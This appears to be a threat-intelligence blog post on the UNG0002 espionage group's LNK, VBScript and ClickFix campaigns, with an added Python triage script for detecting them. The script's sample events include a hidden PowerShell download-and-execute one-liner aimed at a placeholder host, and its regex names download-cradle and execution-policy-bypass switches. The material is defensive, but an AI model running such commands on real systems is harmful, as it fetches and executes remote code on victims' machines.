Edward Kiledjian's Threat Intel

UNG0002 Group Hits China, Hong Kong, Pakistan Using LNK Files and RATs in Twin Campaigns

A sophisticated cyber espionage group designated UNG0002 has conducted targeted attacks across China, Hong Kong, and Pakistan through two major campaigns spanning May 2024 to May 2025, focusing on critical infrastructure and sensitive sectors. The threat actor, believed to originate from Southeast Asia, executed Operation Cobalt Whisper (May-September 2024) and Operation AmberMist (January-May 2025) against defence, energy, civil aviation, academia, medical institutions, cybersecurity, gaming, and software development organizations, using CV-themed decoy documents as lures.

Its attack chains rely on spear-phishing emails delivering LNK shortcut files and VBScript payloads that, through multi-stage infection processes, ultimately deploy Cobalt Strike beacons, INET RAT, Shadow RAT, and Blister DLL loaders. Tactics observed in January 2025 include fake landing pages spoofing Pakistan's Ministry of Maritime Affairs website with fraudulent CAPTCHA verification prompts that use the ClickFix technique to get victims to execute malicious PowerShell commands.

Seqrite Labs researchers emphasize that UNG0002's consistent operations, technical proficiency, and adaptability in targeting sensitive research and intellectual property across multiple Asian jurisdictions represent a persistent and evolving threat to regional cybersecurity, highlighting the need for enhanced defensive measures against APT groups operating in the Asia-Pacific region.
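Both delivery paths described above leave a recognisable process-lineage footprint on an endpoint: a LNK shortcut opened from Explorer shows up as `explorer.exe` spawning a script host with a `.vbs` argument, and a ClickFix lure, where the victim pastes a command into the Run dialog, shows up as `explorer.exe` directly spawning `powershell.exe` with hidden-window, encoded or download-cradle switches. The following triage helper is an added example written for this post; it is not Seqrite's or Kiledjian's tooling, and the event field names and the four sample events are constructed for illustration rather than taken from the campaigns.

```python
"""Triage helper: flag process-creation events that match the LNK -> script
host chain and the ClickFix -> PowerShell pattern described in the post.
Added example; field names (parent, image, cmdline) and sample events are
constructed assumptions, not data from the UNG0002 campaigns."""

import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent: str   # parent image name, e.g. "explorer.exe"
    image: str    # child image name
    cmdline: str  # child command line as logged


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|hta)\b")

# Switches and cmdlets typical of a pasted ClickFix one-liner. Case is
# normalised before matching, so the pattern is written in lower case.
PS_SUSPECT = re.compile(
    r"(-w(indowstyle)?\s+hidden"
    r"|-e(nc|ncodedcommand)?\s"
    r"|-nop\b|-noprofile\b"
    r"|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest"
    r"|frombase64string)"
)


def classify(ev: ProcEvent) -> List[str]:
    """Return the list of pattern names the event matches (empty if benign)."""
    findings = []
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()

    # A shortcut double-clicked in Explorer runs its target with explorer.exe
    # as parent; a script host with a .vbs/.js/.hta argument is the LNK chain.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
        findings.append("lnk-to-script-host")

    # ClickFix: the Run dialog belongs to explorer.exe, so PowerShell launched
    # that way has explorer.exe as its direct parent, plus the suspect switches.
    if parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe"} and PS_SUSPECT.search(cmd):
        findings.append("clickfix-powershell")

    return findings


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "wscript.exe",
              r'wscript.exe //B "C:\Users\victim\AppData\Local\Temp\cv_update.vbs"'),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -nop -c \"iex ((New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/verify'))\""),
    ProcEvent("outlook.exe", "winword.exe",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "CV.docx"'),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -NoExit -Command Get-Process"),
]


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event that matched at least one pattern."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{', '.join(hits)}] {ev.parent} -> {ev.image}: {ev.cmdline}")
```

The fourth sample (an administrator opening an interactive PowerShell from the Run dialog) is deliberately left unflagged: parent-process lineage alone is too noisy, so the rule requires both the `explorer.exe` parent and at least one of the switches a pasted one-liner needs to run silently or fetch a second stage. In a real deployment the same logic maps onto Sysmon Event ID 1 or an EDR process-creation feed, and a `cmd.exe` hop between the shortcut and the script host would need one extra lineage level.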